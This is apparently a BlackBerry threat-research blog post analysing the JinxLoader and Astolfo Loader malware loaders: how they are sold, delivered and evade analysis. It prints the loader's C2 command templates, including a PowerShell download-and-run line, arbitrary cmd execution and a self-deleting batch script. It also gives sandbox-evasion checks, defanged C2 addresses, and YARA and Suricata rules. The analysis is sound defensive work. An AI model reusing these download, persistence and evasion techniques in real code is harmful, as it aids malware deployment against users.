Skip Navigation
BlackBerry Blog

From JinxLoader to Astolfo Loader: The Evolution of a Cyber Threat

Summary

JinxLoader is a relatively new Go-based malware loader typically distributed via phishing emails and designed to deploy additional malware such as next-stage payloads on compromised Windows and Linux systems. First observed in November 2023, it enables the management of multiple infected hosts from a centrally managed server panel. Common payloads dropped include the spyware Formbook and its successor XLoader.

JinxLoader operates as a Malware-as-a-Service (MaaS) operation, a popular business model that makes sophisticated malicious tools accessible to a broader range of wanna-be cybercriminals. Initially sold by a Hack Forums user known as @Rendnza, it is now operated by a second Hack Forums user with the handle @Delfin, who is re-selling the original Golang compiled version. A third user known as @AstolfoLoader recently rebranded it as Astolfo Loader (aka Jinx V3), opting to rewrite it in C++ presumably for performance and file-size reasons.

In this blog, we’ll take a closer look at the dual operation of JinxLoader and Astolfo Loader as a recent example of the ongoing evolution of MaaS operations.

Affected Operating Systems

Technical Analysis

What is JinxLoader?

JinxLoader was originally developed as a native Go-based executable, designed to facilitate the management of large malicious botnets by compromising Windows and L­­inux systems. The malware pays homage to League of Legends character Jinx, who “lives to wreak havoc without care for the consequences.” The fictional character is featured on its ad poster and also on its C2 login panel.

Initially advertised for sale by a user of the hacking website Hack Forums known as @Rendnza, JinxLoader’s first observed use in the wild occurred in late November 2023. Hack Forums is a public Internet (aka surface-net) forum dedicated to discussions related to hacker culture and computer security, and currently ranks as one of the top five websites in the "Hacking" category in terms of web-traffic.

The original JinxLoader tool was marketed on the forum as having the “capacity to drop, remove and run PowerShell,” with the malware authors claiming to prioritize stability and simplicity. The tool cost USD $60 and featured a user-friendly interface and a native backend. The malware author advertised its anti-analysis features via their user page on Hack Forums, noting the tool’s “ability to detect virtualized and datacenter networks,” and claiming that “JinxLoader is suited to fight against analysis and detection.”

 Figure 1: User profile for @Rendnza on Hack Forums advertising the sale of JinxLoader V2.

However, recent developments indicate that the original JinxLoaderV2 code has been sold off to two separate buyers, and @Rendnza closed their Hack Forums account in early February 2024. Two new users operating under the aliases @Delfin and @AstolfoLoader appear to be the purchasers of JinxLoaderV2. While @Delfin claims to be selling JinxLoaderV2 unchanged, @AstolfoLoader opted to rebrand the malware and modify the stub to C++ (Jinx V3), instead of using the original Go-compiled binary.

Figure 2: User profile for @AstolfoLoader on Hack Forums advertising the sale of Astolfo Loader. (”Astolofo Loader” pink text shown on their user profile page above is likely a typo.)
 

Figure 3: Hack Forums post by @AstolfoLoader confirming @Delfin was the “other buyer.”

Named after “Astolfo,” a character from the Fate anime series, Astolfo Loader remains functionally similar to JinxLoader but benefits from the smaller size and improved performance, achieved by rewriting the loader client in C++. This change to C++ significantly reduces the file size from 5.5 MB to 120 KB for the x64 version, and 110 KB for the x86 version.

Figure 4: Hack Forums side-by-side features comparison of JinxLoaderV2 and Astolfo Loader.

The price of Astolfo Loader includes the entry price ($50) and the monthly hosting price ($100). While self-hosting options are not mentioned, @AstolfoLoader provided options to privately DM them for the pricing.

 

JinxLoader
(@Delfin)

Astolfo Loader (@AstolfoLoader)

Per Build

N/A

$50

1 Month

$60

$100

6 Months

$120

$600

Lifetime

$200

N/A

Self-Hosting

N/A

Option to message seller


Attack Vector

JinxLoader and Astolfo Loader, like many MaaS offerings, operate via a subscription/licensing model. The “as-a-service" model enables a wide array of initial access vectors to be used, allowing affiliates and operators who lease the malware to tailor their campaigns according to the specific characteristics and vulnerabilities of their intended targets.

Previously, JinxLoader has been observed being distributed through phishing emails containing a password-protected RAR file containing JinxLoader. RAR files are compressed files or data containers that can be created using WinRAR, a file archiver and extraction utility, and can contain both files and folders.

More recently, BlackBerry researchers identified a HTML phishing lure used to deliver Astolfo Loader (JinxV3). These HTML files contained embedded JavaScript (JS) that extracts the victim’s email address from the URL and makes a POST request to a compromised website, which delivers the next stage of the execution chain — a heavily obfuscated JavaScript file that ultimately deploys Astolfo Loader onto the victim’s machine.  

This embedded JavaScript employs various anti-analysis techniques, such as inserting debugger statements, infinite loops, and event listeners to obstruct inspection of the page contents. It also hijacks console methods, which disrupts normal logging and hampers debugging and analysis efforts made by “pesky researchers” (as @AstolfoLoader likes to call us).

Analysis

Both Astolfo Loader and JinxLoader share a fundamental purpose: the efficient delivery of additional malware. While both loaders can execute PowerShell commands and, in Astolfo Loader’s case, run commands from a command prompt, their primary goal is to remain lightweight and functional. They allow for the deployment of additional payloads either en-masse or to a single host via a web interface, providing a degree of flexibility for their operators.

Hashes (md5, sha-256)

5c466bf05800362a5e237ebc543c4f65

1b936178c97f935fd669773f5d627359bff2e45b3317422c314d1447696cabbe

Compilation Stamp

2024-09-04T14:09:19Z

File Type/
Signature

PE32 executable (GUI) Intel 80386

File Size

675000 bytes (675kb)

Compiler Name/Version

Microsoft Visual C++ Compiler


Astolfo Loader puts a strong focus on anti-analysis measures early in its execution to hinder reverse engineering and sandbox detection. These techniques are designed to disrupt both automated and manual analysis attempts, ensuring the loader can proceed to its core functionality without interference.

However, some of the anti-analysis/anti-virtual machine (VM) checks observed in the sample suggest ongoing refinement, hinting at a potential further evolution in the loader’s evasion strategies. Below is a list of some of the key anti-analysis checks employed by Astolfo Loader during its initial stages of execution:

Type

Details

Processes

processhacker, tcpview, autorun, filemon, procmon, regmon, procexp, idaq, idaq64, wireshark, dumpcap, hookexplorer, importrec, petools, lordpe, sysinspector, proc_analyzer, sysanalyzer, sniff_hit, joeboxcontrol, joeboxserver, resourcehacker, dbg, Fiddler, debugger, srvpost, 11db, strace, ltrace, gdb
Hard Disk wmic diskdrive get model
Looking for “QEMU HARDDISK” or “DADY HARDDISK”
WMI Port Connector SELECT * FROM Win32_PortConnector via WMI through COM interfaces

WMI Video Controller

SELECT * FROM Win32_VideoController, looking for “vmware”, “virtualbox”, “virtual”, “qemu”, “vbox” but if “Microsoft Basic Display Adapter” return
not a VM

Screen Size

Checks that the width of the screen is at least 800 pixels (px) and the height is at least 600 pixels:
Display_width = GetSystemMetrics(0);
Display_height = GetSystemMetrics(1);
if (Display_width >= 800 && Display_height >= 600 )
return 0
Parallel Drivers Checks for the presence of the Parallels drivers “prl_sf”, “prl_tg”, or “prl_eth” in the System32 directory.

Time Based Evasion

The function uses QueryPerformanceFrequency to check performance counters for timing discrepancies typical of virtual machines or sandboxes. It delays execution by sleeping for extended periods, evading short-lived analysis environments.


Astolfo Loader includes the ability to receive and execute specific "tasks" from its command-and-control (C2) server. These tasks can be seen in the table below:

Figure 5: Astolfo Loader “tasks” dropdown.

Command

Details

runp

Execute PowerShell via cmd.exe /c
Cmd.exe /c powershell <command>
 

install

Download other malware via PowerShell
powershell -Command \"Invoke-WebRequest -Uri '<URL>' -OutFile $env:TEMP\\DllHelper.exe\"

installp

Install Persistence - CurrentVersion\Run
Registry Value:  “Registration form

load

Create “uninstall.bat” which is used to terminate and remove the malware from the infected device:
:loop
taskkill /F /IM "<Filename>.exe" >nul 2>&1
del "<Filename>.exe"
if exist "<Filename>.exe goto loop
del "%~f0"

remove

Execute uninstall.bat batch file
cmd.exe /c uninstall.bat

cmd Execute any command
Cmd.exe /c <command>


Network Infrastructure

Before establishing a connection to its C2 server, Astolfo Loader performs an HTTP GET request using Winhttp.dll functions to the legitimate IP information site ipinfo.io to retrieve the country code based on the intended victim’s IP address. This country code is then compared to Astolfo Loader’s predefined blacklist. If the country code matches one from the list below, the loader halts further execution, to avoid infecting systems in these countries.

Country Code

Country Name

RU

Russia

UA

Ukraine

BY

Belarus

KZ

Kazakhstan

GE

Georgia

AM

Armenia

AZ

Azerbaijan

EE

Estonia

LV

Latvia

LT

Lithuania

MD

Moldova

TM

Turkmenistan

UZ

Uzbekistan

KG

Kyrgyzstan

TJ

Tajikistan


In addition to this geolocation check, Astolfo Loader also decrypts 39 different blocked IP addresses. It then makes a second GET request to public IP address check site checkip.amazonaws.com/ to obtain the victim’s external IP address. This IP is then compared with the decrypted list, likely as an additional measure to identify if the process is being executed from specific datacenters blocked by the malware author, as mentioned in the original advertisement on the Hack Forums site.  

Once the geolocation and IP address checks are completed, the loader proceeds to connect to the following malicious C2 servers:

Domain Name

Samples’ Hashes (MD5, SHA256)

First/Last Seen

hxxp://xscapezo[.]capetown:6171

5c466bf05800362a5e237ebc543c4f65,1b936178c97f935fd669773f5d627359bff2e45b3317422c314d1447696cabbe

2024-08-31/ 2024-09-22

 

hxxp://serverdops[.]ddns[.]net:6171

5c466bf05800362a5e237ebc543c4f65,1b936178c97f935fd669773f5d627359bff2e45b3317422c314d1447696cabbe

 

2024-08-15/ 2024-09-25

 

 


Conclusions

The explosion in popularity of MaaS operations has made it increasingly easy for cybercriminals to access and deploy complex malware without the need for deep technical expertise. Services like JinxLoader and its successor, Astolfo Loader (Jinx V3), exemplify how such tools can proliferate quickly and affordably and can be purchased via popular public hacking forums that are accessible to virtually anyone with an Internet connection.

Despite Astolfo Loader being a C++ adaptation, the original JinxLoader continues to operate under @Delfin as originally intended, offering additional flexibility and ease of use to its operators. This demonstrates how the proliferation of MaaS and the sites that foster such services facilitate the rapid spread of malware variants, making it simple for threat actors to acquire and deploy malicious software at scale.

The interconnected and constantly evolving nature of these threats necessitates a comprehensive and proactive cyber threat intelligence approach to safeguarding your digital assets.

How BlackBerry Can Help

BlackBerry has verified that its cybersecurity endpoint protection software, powered by Cylance® AI, protects our customers against the threats detailed in this blog.

Detecting and responding to increasingly evasive malware requires visibility across all security solutions. BlackBerry® cybersecurity solutions such as CylanceMDR™ provide automated, up-front protection against attacks, while also spotting indicators of compromise (IoCs) and delivering faster contextual understanding of alerts and events.

Get immediate, continuous resilience for your growing business without the overhead of an in-house Security Operations Center (SOC). Our expert team, armed with an advanced AI platform, integrates with your existing security environment to provide complete lifecycle defense. With our innovative AI and exceptional team of experts, you can trust us to help you stay a step ahead of potential threats such as JinxLoader and its variants.

APPENDIX 1 – Indicators of Compromise

Hashes (md5, sha-256),

5c466bf05800362a5e237ebc543c4f65

1b936178c97f935fd669773f5d627359bff2e45b3317422c314d1447696cabbe

PDB Path

N/A

Mutex in the System

Local\8ECDC8B3-D134-40A7-A8C1-32265D09AD3C

Network Indicators

hxxp://serverdops[.]ddns[.]net:6171

hxxp://xscapezo[.]capetown:6171

 

Hashes (md5, sha-256),

4501a538be3100c424f65e3642a434c3

f51f984211d289d1d611952855749a5fefea4bebec377073182bde8ce12af2a8

PDB Path

C:\Users\potca\source\repos\AstofloLoaderStub\Release\AstofloLoaderStub.pdb

Mutex in the System

Local\AD8C6F3C-8D19-4C2D-90BB-CD2FC2740A00

Network Indicators

hxxp://154[.]216[.]17[.]65/


APPENDIX 2 – Applied Countermeasures

Yara Rules

import "pe"

rule cybercrime_AstlofloLoader : JinxV2 CPP
{
    meta:
        description = "Detects Astolfo Loader samples (JinxV3) C++ samples"
        author = "The BlackBerry Threat Research and Intelligence Team"
        distribution = "TLP:AMBER+STRICT"
        version = "1.0"
        last_modified = "2024-09-30"
        hash1_md5 = "5c466bf05800362a5e237ebc543c4f65"
        hash1_sha256 = "1b936178c97f935fd669773f5d627359bff2e45b3317422c314d1447696cabbe"

    strings:
        $s1 = "Win32_VideoController"
        $s2 = "Microsoft Basic Display Adapter"
        $s3 = "vmware"
        $s4 = "virtualbox"
        $s5 = "virtual"
        $s6 = "qemu"
        $s7 = "vbox"
        $s8 = "prl_sf"
        $s9 = "prl_tg"
        $s10 = "prl_eth"
        $s11 = "Win32_PortConnector" wide
        $s12 = "wmic diskdrive get model"
        $s13 = "QEMU HARDDISK"
        $s14 = "DADY HARDDISK"
        $s15 = "svchost.exe"
        $s16 = "cmd.exe"
        $s17 = "runp"
        $s18 = "powershell"
        $s19 = "installp"
        $s20 = "taskkill /F /IM"
        $s21 = "powershell -Command \"Invoke-WebRequest -Uri"
        $s22 = "Content-Type:"
        $s23 = "User-Agent:"
        $s24 = "Content-Length:"
        $s25 = "Win32_Processor"
        $s26 = "SELECT * FROM Win32_OperatingSystem"
        $s27 = "https://checkip.amazonaws.com/"
        $s28 = "https://ipinfo.io/country"

    condition:
         uint16(0) == 0x5a4d and all of ($s*)
}


Suricata Rules

Enterprise cybersecurity company Proofpoint has already released a Suricata rule to detect JinxLoaderV2 based on its User-Agent string. This rule remains applicable to Astolfo Loader, as the malware continues to use the same encoded hex string in its User-Agent.

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Encoded JinxV2DEV User-Agent Observed (4a696e785632444556)"; flow:established,to_server; http.user_agent; content:"4a696e785632444556"; bsize:18; reference:md5,d4d464e22776e552d215e5fe39373280; classtype:trojan-activity; sid:2049659; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, created_at 2023_12_12, deployment Perimeter, confidence High, signature_severity Critical, updated_at 2023_12_12;)

Credit: https://rules.emergingthreats.net/open/suricata/rules/emerging-malware.rules


APPENDIX 3 – Detailed MITRE ATT&CK® Mapping

Tactic

Technique: Sub-Technique

Context

Resource Development

Acquire Infrastructure: Botnet

T1583.005

A compromised machine will act as a bot and listen for commands for download, creation, installation, and execution.

Initial Access

Phishing: Spearphishing Attachment

T1566.001

Astolfo Loader was delivered as the final stage of a phishing lure.

Execution

Command and Scripting Interpreter: JavaScript

T1059.007

Astolfo was embedded within heavily obfuscated JavaScript.

Defense Evasion

Discovery

Debugger Evasion

T1622

Astolfo Loader calls tasklist and checks the list of running processes against a list of analysis tools including debuggers.

Defense Evasion

Obfuscated Files or Information: Encrypted/Encoded File

T1027.013

The Astolfo Loader payload was embedded within obfuscated JavaScript.

Defense Evasion

Deobfuscate/Decode Files or Information T1140

Astolfo Loader decodes embedded XOR strings.

Defense Evasion

Discovery

Virtualization/Sandbox Evasion

T1497

Astolfo Loader determines whether it is in a virtual environment by checking for the following items:

  • Hard Disk
  • WMI Port Connector
  • WMI Video Controller
  • Screen Size
  • Virtual Machine Artefacts

Defense Evasion

Discovery

Virtualization/Sandbox Evasion: Time Based Evasion T1497.003

Astolfo Loader uses performance counter checks to detect timing discrepancies typical of virtual machines or sandboxes. It delays execution by sleeping for extended periods, bypassing short-lived analysis environments.

Discovery

Process Discovery

T1057

Astolfo Loader calls tasklist and compares the output with a list of decoded analysis process names.

Command-and-Control

Non-Standard Port

T1571

The Astolfo loader connects back to its C2 via port 6171.


Further Reading:

The BlackBerry Research and Intelligence Team

About The BlackBerry Research and Intelligence Team

The BlackBerry Research and Intelligence team is a highly experienced threat research group specializing in a wide range of cybersecurity disciplines, conducting continuous threat hunting to provide comprehensive insights into emerging threats. We analyze and address various attack vectors, leveraging our deep expertise in the cyberthreat landscape to develop proactive strategies that safeguard against adversaries.

Whether it's identifying new vulnerabilities or staying ahead of sophisticated attack tactics, we are dedicated to securing your digital assets with cutting-edge research and innovative solutions.